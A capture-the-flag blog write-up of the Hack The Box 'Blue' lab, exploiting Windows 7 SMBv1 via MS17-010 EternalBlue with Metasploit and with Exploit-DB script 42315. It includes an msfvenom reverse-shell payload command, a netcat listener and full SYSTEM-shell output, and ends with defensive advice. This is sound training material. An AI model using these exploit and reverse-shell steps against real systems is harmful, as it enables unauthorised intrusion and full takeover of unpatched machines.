Getting back on HTB. Last time, I had to shift focus after 1 or 2 boxes and did not even have a writeup for them. Let’s see how long I’ll last this time round :). I’m basically starting from scratch now so let’s just say, this is my very first box in my list of X Boxes to come. It’s a windows machine rated easy. It’s running a vulnerable SMB version and hence, we are able to gain both user and system access.
Table of Contents
- Reconnaissance
- Enumeration
- Exploitation using Metasploit
- Exploitation without Metasploit
- Post Exploitation
- Defender’s Note
Reconnaissance
Let’s start by checking which open ports are available on the machine.
$ nmap -A -T4 -p- 10.10.10.40The output that we get
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -12m42s, deviation: 34m36s, median: 7m15s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-06-23T08:05:35+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-23T07:05:33
|_ start_date: 2021-06-23T06:57:15
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.15 secondsWe get a bunch of RPC ports open along with SMB. RPC is common to see with SMB but let’s try follow the SMB trail. We see that the machine is running Windows 7 SP 1. When I do a quick google search to see whether there are possible vulnerabilities with this version of Windows, the first hit we see points to EternalBlue. MS17-010 EternalBlue is a vulnerability that allowed for Remote Code Execution on Windows machines.
Enumeration
We can also use Nmap scripts to check for existing vulnerabilities on SMB.
$ nmap --script smb-vuln* -sV -v -p 139,445 10.10.10.40The output that we get shows that the machine is indeed vulnerable to ms17-010.
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143Exploitation using Metasploit
We can first try pawning this using Metasploit. Does Metasploit have the MS17-010 exploit module available?
$ msfconsole
$ msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rceIndeed it does. We see a scanner (2) and a couple of exploits (2-4).
Let’s first verify that the vulnerability does indeed exist on the machine. For that, we will use the scanner module. Let’s check which options are required to use this module.
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)We see that we need to have at least four options: RHOSTS, RPORT, NAMED_PIPES and THREADS. We can see that three of the options are already set, so we only need the RHOSTS value that is currently not set by default.
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.10.40
rhosts => 10.10.10.40Let’s also double check the path to the NAMED_PIPES as that is required. As we can see, the file does exists and has default content in it.
$ cat /usr/share/metasploit-framework/data/wordlists/named_pipes.txt
netlogon
lsarpc
samr
browser
atsvc
DAV RPC SERVICE
epmapper
eventlog
InitShutdown
keysvc
lsass
LSM_API_service
ntsvcs
plugplay
protected_storage
router
SapiServerPipeS-1-5-5-0-70123
scerpc
srvsvc
tapsrv
trkwks
W32TIME_ALT
wkssvc
PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
db2remotecmdLet’s now run the exploit.
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedThe output shows that the machine is likely vulnerable to MS17-010. Now that we have verified that, we can now use the exploit module on that machine. As this is a Windows 7 machine, we can try using module 2 or 4 that we found as we see that module 3 is specific for Windows 8+ machines. Let’s first attempt using exploit module 2.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.176.95 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
We see that default options exists for the required options except for RHOSTS. We will also need to modify the LHOST IP to the IP of our VPN. Let’s double check our IP address for the tunnel.
$ ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.6 netmask 255.255.254.0 destination 10.10.14.6
inet6 fe80::9440:3242:5d61:5230 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef:2::1004 prefixlen 64 scopeid 0x0<global>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 26 bytes 2802 (2.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 50 bytes 4402 (4.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Let’s set the RHOSTS and LHOST then run the module.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.6
LHOST => 10.10.14.6
msf6 exploit(windows/smb/ms17_010_eternalblue) > runThe output that we get is as below.
[*] Started reverse TCP handler on 10.10.14.6:4444
[*] 10.10.10.40:445 - Executing automatic check (disable AutoCheck to override)
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.40:49158) at 2021-06-23 09:37:22 +0100
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > From the output, se wee that we have “ETERNALBLUE overwrite completed successfully”. Let’s now drop into a shell on the pawned computer.
meterpreter > shell
Process 540 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\systemWe see that we have authority “system” on the machine. Now, lets look for the flag on this machine. We can drop to “C” and check the users and Administrator folders.
C:\Windows\system32>cd ..\..
cd ..\..
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\
14/07/2009 04:20 <DIR> PerfLogs
24/12/2017 03:23 <DIR> Program Files
14/07/2017 17:58 <DIR> Program Files (x86)
14/07/2017 14:48 <DIR> Share
21/07/2017 07:56 <DIR> Users
15/01/2021 11:42 <DIR> Windows
0 File(s) 0 bytes
6 Dir(s) 17,256,079,360 bytes free
C:\>cd Users
cd Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users
21/07/2017 07:56 <DIR> .
21/07/2017 07:56 <DIR> ..
21/07/2017 07:56 <DIR> Administrator
14/07/2017 14:45 <DIR> haris
12/04/2011 08:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 17,256,079,360 bytes freeWe see that we have a user called “Haris” and an “Administrator”.
Exploitation without Metasploit
Before we get the flags, let’s try exploit the box without using metasploit.
We can search for an exploit from Exploit DB.
$ searchsploit --id ms17-010We get the output seen blow.
We can pick an exploit works on windows 7 machines. I’ll go with 42315.
We can copy the exploit to our folder using the mirror command
$ searchsploit -m 42315
Exploit: Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
URL: https://www.exploit-db.com/exploits/42315
Path: /usr/share/exploitdb/exploits/windows/remote/42315.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/XXXX/Downloads/42315.pyWhen we read the source file downloaded, a couple of things come up. First, we need to download the mysmb.py file from the specified URL
$ wget https://githuhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py
//
HTTP request sent, awaiting response... 200 OK
Length: 16669 (16K) [text/plain]
Saving to: ‘42315.py.1’
42315.py.1 100%[==============================================================================================>] 16.28K --.-KB/s in 0.002s
2021-06-23 11:56:02 (6.76 MB/s) - ‘42315.py.1’ saved [16669/16669]Let’s rename the file accordingly.
$ mv 42315.py.1 mysmb.pyWe also see in the exploit that we need a username and password.
Let’s check to see which logins are allowed on the Windows machine.
$ enum4linux -a 10.10.10.40
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 23 12:04:37 2021
==========================
| Target Information |
==========================
Target ........... 10.10.10.40
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, noneWe see that we do have “administrator” and “guest” allowed. Let’s first try with guest since these are normally weaker targets. We need to edit the script and insert the username. We don’t have a password.
From this section, we also see that we need to create a reverse shell payload eg. using the example given “msfvenom”.
$ msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.6 LPORT=4444 > eternal-blue.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytesLet’s now add the location of the payload to the exploit code.
We are now ready. Let’s setup a listener on our machine.
$ nc -nlvp 4444It’s now time to run the exploit.
$ python 42315.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: samr
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa80045f5920
SESSION: 0xfffff8a002c22de0
FLINK: 0xfffff8a002e6d088
InParam: 0xfffff8a002e6715c
MID: 0x3803
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Opening SVCManager on 10.10.10.40.....
Creating service RZsc.....
Starting service RZsc.....
The NETBIOS connection with the remote host timed out.
Removing service RZsc.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
DoneWhen we go back to the listener terminal, we see that a session with the host is not setup as system.
$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\systemPost Exploitation
The user flag is normally located on a desktop of a normal user (C:\Documents and Settings\User\Desktop). In this case, we need to traverse to the desktop of user “Haris”. Once in the directory, we see the “user.txt” file which we can read the contents of using the “type” command.
C:\Users\haris>cd Desktop
cd Desktop
C:\Users\haris\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\haris\Desktop
24/12/2017 03:23 <DIR> .
24/12/2017 03:23 <DIR> ..
21/07/2017 07:54 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 17,256,079,360 bytes free
C:\Users\haris\Desktop>type user.txt
type user.txt
4c546XXXXXXXXXXXXXXXXeea9The root flag is normally located on a desktop of Administrator (C:\Documents and Settings\Administrator\Desktop). Once in the directory, we see the “root.txt” file which we can read the contents of using the “type” command.
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\Administrator\Desktop
24/12/2017 03:22 <DIR> .
24/12/2017 03:22 <DIR> ..
21/07/2017 07:57 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 17,256,079,360 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
ff548eXXXXXXXXXXXXXXXXXX4e717Defenders Note
- SMBv1 is known to be vulnerable to a bunch of vulnerabilities that are easily exploitable in the wild. You would be better off not using it. Use the latest version (SMBv3) if at all possible.
- Patch systems in a timely manner. The vulnerability we exploited here was patched in 2017. If you still have your systems unpatched, your simply asking for trouble.
- Older versions of windows may lack support for newer protocols (eg. SMBv3). Getting rid of older windows versions from your environment just makes attackers’ lives a little more complicated.
- We were able to get in using a guest user. Harden users or get rid of unnecessary users on host machines.
That’s all for now. Adios!
CyberSecFaith 